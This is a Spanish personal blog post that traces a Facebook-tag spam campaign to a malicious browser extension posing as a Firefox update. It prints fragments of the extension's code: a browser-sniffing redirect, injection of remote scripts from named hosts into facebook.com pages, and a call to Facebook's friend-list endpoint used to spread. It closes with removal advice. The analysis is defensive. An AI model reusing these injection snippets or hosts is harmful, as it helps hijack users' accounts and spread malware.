Malware
El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h WDF…!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:
Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.<?php var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1; var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1; var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1; var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1; if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"} else if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"} else if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"} else {var inst="http://www.sosyalpaket.net/chrome.php"} ?>
Con el siguiente mensaje:
Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.
Mensaje
Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/
y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.
File
Y encontré algo que me resulto familiar
if(location.hostname.indexOf("facebook.com") >= 0){ addJavascript('http://sosyalpaket.net/yeni.php'); addJavascript('http://fbmedyahizmetleri.com/bakgel.php'); addJavascript('http://facebookhizmetlerim.com/user.php'); }
En el user.php me tope con:
<?php https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } ?>
Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.
Complemento
Si es que contienen, lo más razonable es eliminarlo.
No hay comentarios. :
Publicar un comentario